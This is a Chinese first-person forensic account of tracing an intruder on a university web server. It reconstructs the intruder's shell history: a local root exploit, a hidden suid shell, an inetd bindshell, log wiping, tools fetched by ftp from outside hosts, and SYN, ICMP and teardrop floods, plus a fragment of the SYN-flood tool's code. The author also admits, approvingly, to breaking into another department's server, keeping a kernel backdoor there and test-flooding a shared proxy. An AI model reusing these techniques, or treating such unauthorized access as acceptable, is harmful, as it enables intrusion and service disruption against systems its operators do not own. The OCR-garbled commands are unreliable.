在虛擬的網絡環境中真實地存在著一群人，他們被稱作黑客，在常人眼里，黑客總是神出鬼沒，來去無蹤，不受任何拘束。但事實上，黑客也是能被發現和追蹤到的，即使是頂級的黑客也有被追蹤到的時候。當管理員熟悉黑客的慣用手段，具有更高的技術和更好的耐心時，黑客往往就無法遁形了。網絡入侵檢測和分析是一門涉及廣泛的復雜技術。以下發生的故事只是在一次偶然的機會里發生的黑客追蹤事件，是最簡單的入侵分析。

1．發現黑客

學期初筆者接管了S大學宣傳部的網站，這是個小網站，有四臺電腦，一臺Web服務器，三臺制作和備份的工作站組成。Web服務器裝有兩個CPU，裝載Windows 2000 Server和ⅡS 5.0。平時的更新維護由制作小組的成員完成，筆者只負責些技術方面的問題。在接管時筆者關閉了Web服務器的IPC$連接和默認共享，想給它的IIS打補丁時，剛巧那天校園網和Internet斷開了，補丁下載不了，筆者以為這樣的小網站入侵者一般不會感興趣，一時也就擱下了。

一個月后的一天，筆者忽然心血來潮再想給它打補丁，卻赫然發覺它簡直是完美的化身——什么補丁都打上了。誰干的?問遍制作小組的成員，都沒人知道(的確，不是對此有了解的人不會一天到晚老想著給“愛機”喂幾個“布丁”吃)。總不會機子自己裝的，機器還沒有這么高的智商。又查看了一下，發現Windows 2000的終端服務也被開啟了。事情開始明朗，那就是：有入侵者！

2．守株待兔

一時疏忽引來了一位黑客，對筆者來說可不是件壞事。先看看日志吧!打開事件管理器，發現日志少得可憐，進入C：WINNTsystem32LogFiles目錄下，“事件”、“應用程序”等日志的*．log文件全是十幾天前新建的，也就是說十幾天前的日志全慘遭殺戮了，再看其他ⅡS等日志也是同樣遭遇。沒了日志，雖然能斷定他可能是利用ⅡS漏洞(idq、ida、unicode，這么多漏洞隨便挑一個都能搞定)進入的，但是這位黑客先生來自哪里和在我們的服務器里干了些什么就無從知曉!筆者又檢測了服務器打開的端口，發現了一個綁定在6688加密的shell，這位可愛的黑客先生先幫忙打了補丁，又沒有什么破壞活動，還留了后門，便斷定他一定會再來。于是決定維持一切原樣不變，守株待兔!當然不變的只是外表，筆者安裝了入侵檢測系統監控6688端口和幾個敏感端口，只要一旦有人連接，檢測系統就會報警。另外，還修改了一個擊鍵記錄程序專門監控那個6688的shell。為了以防萬一，還安裝了硬盤保護卡。盡管花了不少心血，甚至讓警報用短消息發到手機，但在以后漫長的幾個星期中，除了幾次誤報，這位黑客再也沒有出現，似乎從此銷聲匿跡了。也許只是一時性起或目的已經達到，他已經放棄了這個攻破的堡壘。

3．將追蹤進行到底

由于前車之鑒，在決定放棄追蹤后，筆者對服務器進行了全面、系統的安全配置。該關的關，該改的改，該打補丁的打補丁。但在檢查system．ini時在發現了這樣一句： shell=c：／winnt/system32／iishelp／system32.exe。不會是那位黑客先生下的吧?可是奇怪呀：在發現黑客時曾經花了半天時間對Windows 2000所有可疑的進程都一一核查過，沒有這個進程呀!原來，在這個隱藏得很深的文件夾里面一堆垃圾文件里有一個沒加密的p．txt文本文件，上面雜七雜八記錄了這臺服務器上登錄過的用戶和密碼和一些有趣的東西，以下是其中的一部分內容，為了便于閱讀對其做了些整理：

jwf12xx

>horse20xx<

[用戶登錄]

--------

administrator

>8812abcxxx<

[用戶登錄]

--------

bj.bs.ourgame.com(北京聯眾)

blisslxxx

1080

>forayxxx<

[登錄信息]

……

210.33.xx.x<===好像是學校Web和Mail的服務器的IP。

jwcxxx

>34xxx<

[TELNET]

……

……

210.33.xx.x<===這也是。

jwcxxx

>34xxx<

[FTP]

……

看到這里，大家都知道了吧，原來這個充滿迷惑性的進程是一個擊鍵記錄程序。不過在筆者發現和檢測進程之前它已經被刪掉了，看來這黑客可能已經放棄了這臺機器了。但是這位黑客對這個程序不是太熟悉(可能從哪里COPY來的)，不但在拆卸的時候沒把痕跡和生成的其中的一個密碼文件清理掉，還讓它把那些“不該記的”也記下來了。在上面的記錄里除了一些用戶名和密碼外，還有多個指向一個IP)的telnet和ftp的用戶的記錄，但這個用戶不是我們所有的，而且這個IP地址是S大學的網頁和郵件主服務器，事情一下子變得明朗了：由于我們校園網路由器對23、2l這些敏感的端口的TCP連接作了過濾的，只允許出站連接而拒絕入站連接，這位黑客兄弟想必是拿我們的服務器作為攻擊學校主頁和郵件服務器的跳板了。看來得把追蹤進行到底了!

學校的主頁和郵件服務器上是一個版本較老的UNIX。Web服務軟件是Apache;郵件服務軟件為sendmail(是最新版本，沒有致命漏洞)。為了方便下面的講述，我們把它稱作主機S。幾年前，它的安全狀況實在很糟，亂七八糟的服務開了一大堆，R類服務也沒關，網管根本沒有對其進行安全配置。但由于部門不同，它不屬于我們管理。一次筆者隨便找了個rpc漏洞便進了S主機，進去四處逛了一圈，實在無事可干，便給網管寫了一封長長的信，里面一一列舉了該服務器的安全漏洞。幾天后主機S的安全面貌已經煥然一新了，想非法進入都很困難了。當然筆者還是留了一手方便進出：內核后門，網管果然沒有發現，也是從那時起S大學的路由器過濾掉了所有對2l、23的入站的TCP連接，也就是說在校園網外對其掃描，這幾個端口看起來是關閉的，也無法連接的；但校園網內的機子還是可以連接的。這可能也就是那位黑兄對我們這個宣傳科的服務器進行攻擊的原因。現在他已經放棄了我們這個跳板說明他可能已經得手了。

4．黑客使用技術和心態分析

幾天前筆者還在考慮是否該把S主機上的后門卸了，想不到最后還有用武之地。利用內核后門進入主機S，一切還是那么熟悉。記得在宣傳科的服務器的p.txt里有一個jwe的用戶，先看看passwd再說：

#cat／etc／passwd

……

……

jwc：x：688：501 jwc：／home／jwc：／bin/sh

……

……

(以上共省略100多個用戶)

不知道jwe是新加的用戶還是被破解了密碼的用戶，S主機里這么多用戶，多個普通用戶實在很難發現。再查看日志，所有關于jwe的日志全沒了。但這個jwc只是一般用戶呀，肯定還有后招。又ps-auxlgrep jwe了一下發現了幾個可疑進程。在找來入侵痕跡分析工具準備花時間進行全面檢查時，意外地在用戶jwe的主文件夾home／jws／下面發現了一個．history文件。這個.history記錄了所有在shell命令中鍵入的命令，這無疑是筆者了解這位黑客所使用的技術和當時的心態的絕好機會。惟一的遺憾是日志全被刪了，這位入侵者是如何進入的沒有痕跡可查了。最大的可能是用戶的暴力猜解，S主機用戶太多了，許多用戶缺乏安全意識，設置的口令又簡單得令人難以置信，很容易破解，當然也不排除利用其他筆者未知的或新發現的漏洞進入的。

下面讓我們來看看由這個.history文件講述的故事吧。為了便于閱讀，對其進行了一些省略和修改(前為．history的內容，后面是分析)。




.history



分析





w



誰在系統上。





ftpfirsthost



此次ftp下載了許多工具：lp.c，shell.c，port．c，clean.tar





gcc-olp．clp



編譯lp.c從后來的整個攻擊過程看，這應該是個本地溢出取得root shell的程序。





chod



擊鍵錯誤。這點可比我好得多，我平均每10條命令便會打錯一條，他整個過程中只有三四次擊鍵錯誤。





chomdu+xlp



改變lp的模式，使其成為可執行程序。





lp



應該是本地溢出，取得管理員權限。

黑客在檢查系統中是否只有他一人，并迅速下載了工具，實行了本地溢出，取得了系統管理權。

我們接著看。





mkdir／usr／lib／...



建立新目錄...。在unix下本級目錄為.。上一級目錄為..。所以...具有一定的欺騙性(不過這招好像早被用濫了)。





cp*．*/usr／lib／...



他在轉移工具到新建的目錄下，是想藏的好點，呵呵。





rm*.*



刪除





ls-al



看看工具在了沒有。





cp／bin／ksh／usr／lib／...／h



拷貝了一個suid root shell.并取名為h。在UNIX中，不加參數的ls是不會顯示.開頭的文件，要加參數a才會顯示。h具有一定的隱藏性。





chomd+s，ust／lib／...／.h



設置suid位。





sr／sbin／addusr wdyr



有了一個用戶名還不夠，又加了一個wdyr用戶。





cat／etc／passwd



不放心，進去看看加了沒有。





……



……

這位黑客在／usr／lib／下創建了一個...新目錄，把一些工具軟件藏到了里面，又進行了一系列的活動進一步鞏固對系統的控制。

然后，黑客在對整個系統及其網絡結構作全面了解。






ps+aux lmore



列出所有的進程。





netstat-an lgrep listen



查看哪些端口運行著哪些服務。





cat／etc／inetd．conf



刪除





ls-al



同上。





cat／etc／hosts lmoete



他在查看網絡狀況。





Find／name index．htm-print



看來這家伙有改網頁的欲望。





……



……

之后，黑客先生編輯了inetd．conf，把他的bindshell捆定在了60000高位端口上，還編譯了日志清理工具，對日志進行了清理。




gcc-o port．c port



編譯port.c。后來的測試中我發現這是個端口掃描器。





chmod u+x port



改變port的模式，使其成為可執行程序。





Port 127．0.0.11 200&



他在測試Port的功能。測試的目標是校內X系機房的IP，127.0.0.1是我處理過了的，掃描的端口是1到200。&是后臺運行。





gcc-o sheU．c sh



編譯shell.c這個shen是個bind suid sheu后門。





clunod u+x sh



 





vi／etc／inetd



這是個輸入錯誤。Inetd是程序，不能編輯的。





vi／etc／inetd．conf



他編輯了inetd．conf文件，把他那個bind shell放進去，以后每次啟動會都會啟動他。





……



……

（續）











gcc-o port．c port



編譯port.c。后來的測試中我發現這是個端口掃描器。





killall-HuP inetd



讓inetd進程重讀它的配置文件inetd．conf。





Port 127．0.0.11 200&



他在測試Port的功能。測試的目標是校內X系機房的IP，127.0.0.1是我處理過了的，掃描的端口是1到200。&是后臺運行。





gunzlp*



把…文件下的所有文件解壓。





tar-xvf clean．rar



把clean．tar包解開。





ls



 





／make



編譯。





cleanjwc



清理日志他從來都是很積極的。





cd．．



回上一級目錄。

最后，這個家伙在占領了系統后對他人的系統進行了狠毒的攻擊，然后再次清理日志退出了系統。




ftp secondhost



此次fip傳輸的目的下載攻擊工具。下載了一個名為imap.c的工具，這個東西可能是icmp攻擊的工具。不知道要對誰進行殺戮了！





……



省略imap的編譯和chomd過程。





cat 127 0．0.0.1．log



查看這個掃描結果文件。127.0.0.1.log文件是那個port掃描的結果。





imap

-t3-1127.0.0.1&



應該是后臺運行對127．0．0.1也就是S大學X系機房的服務器發動了ICMP攻擊。參數t可能是設置時間。





……



 





ftp thirdhost



此次ftp傳輸的目的又是下載了兩個攻擊程序，tear和tes的兩個二進制文件。看來imap的攻擊沒有奏效或效果不夠理想。





……



省略該黑客用tear發動的攻擊，從名字看我猜町能是UDP的淚滴攻擊。但是效果還是不理想，以至后來他生氣地刪了iamg和tear兩個文件。





ps-x lgrep



列出所有grep的應用程序進程。





kill-9029



殺掉imap進程。





kill-9030



殺掉tear進程。





reienlldajs



亂敲一氣。攻擊沒有成功，他很生氣。





tst-t3 1270.0.180



開始用tes攻擊，攻擊端口80。好象效果不錯。因為他接下來狠毒地用tst對127.0.0.1進行了長時間的攻擊。





Nohup tst –t10000127.0.0.2 127.0.0.180&



nohup使他退出系統后程序仍繼續運行。-t 10000攻擊10000分鐘，127．0.0.2是偽造的源地址，127.0.0.1是攻擊目標地址，80是攻擊端口，&后臺運行。





……



 





rm*.c*.tar



他在做清理工作了，準備走了。





Clean jwc



再次清理日志。





……
由.history文件講述的故事到此就結束了。

縱觀整個入侵過程沒有什么疑惑難解之處，當然實際的-history的文件比較雜亂得多，以上是整理的結果。至于關于那個tst程序的具體情況在下一部分里有介紹。

5．關于攻擊工具tsl

tst是SYN攻擊工具。把tst工具復制了回來，對寢室樓的代理服務器的http的代理端口發動了攻擊進行測試，幾秒鐘后，就聽見室友在喊：“網頁怎么打不開了?”。結束了測試，分析TCPDUMP追蹤到的記錄(源主機、目標主機經過了處理)。




時間戳



源主機．源端口



目標主機．目標端口



TCP標志



序列號



應答號



TCP窗口

大小





09：17：22.5660



hacker．601



server．80



S



1382726961



1382726961(0)



Win4096





09：17：22.7447



hacker．602



server．80



S



1382726962



1382726962(0)



Win4096





09：17：22.8311



hacker．603



server．80



S



1382726963



1382726963(0)



Win4096





09：17：22.8868



hacker．604



server．80



S



1382726964



1382726964(0)



Win4096





09：17：22.9434



hacker．605



server．80



S



1382726965



1382726965(0)



Win4096





09：17：23.0025



hacker．606



server．80



S



1382726966



1382726.966(0)



Win4096





09：17：23.1035



hacker．607



server．80



S



1382726967



1382726967(0)



Win4096





09：17：23.1621



hacker．608



server．80



S



1382726968



1382726968(0)



Win4096





09：17：23.2284



hacker．609



server．80



S



1382726969



1382726969(0)



Win4096





09：17：23.2825



hacker．610



server．80



S



1382726970



1382726970(0)



Win4096





09：17：23.3457



hacker．611



server．80



S



1382726971



1382726971(0)



Win4096





09：17：23.4083



hacker．612



server．80



S



1382726972



1382726972(0)



Win4096





……



……



……



……



……



……



……

從上面的記錄我們看到主機hacker從不同的端口(這里是遞增的，也可以隨機)在短短幾秒內就向主機server的80端口發出了上百個連接請求。筆者又對其攻擊代碼ip頭部分進行了分析：

／*ip頭填充信息*/

packer．ip．version=4；/*(4位)版本號*／

packer．ip．ihl=5；/*(4位)頭長度*/

packer．ip．tos=0；/*(8位)服務類型*/

packer．ip．tol_len-htons(40)；/*(16位)數據包總長度*/

packer．ip．id=getpid()；/*(16位)認證標識*/

packer．ip．frag_off=0；/*(13位)分段偏移量*/

packer．ip．ttl=225；/*(8位)生存期*／

packer．ip．protocol=IPPROTO_TCP；/*(8位)協議類型*／

packer．ip．check=0；/*(16位校驗和)*/

packer．ip．saddr=sadd；/*(32位)源地址*/

packer．ip．taddr=tadd；/*(32位)目標地址*/

這無疑是SYN潮水攻擊。SYN攻擊是短時間內發送潮水般的連接請求，但不完成3次握手建立正常的連接，而讓等待連接的數量超過系統的限制數量，從而使被攻擊系統無法建立新的服務。為防止產生RESET信號而使被攻擊系統釋放連接請求所占的內存，這個程序還使用了一個錯誤檢查程序來確定他所選的假地址是可路由的并且不處于運行狀態，這與文章的主題無關，就不多說了。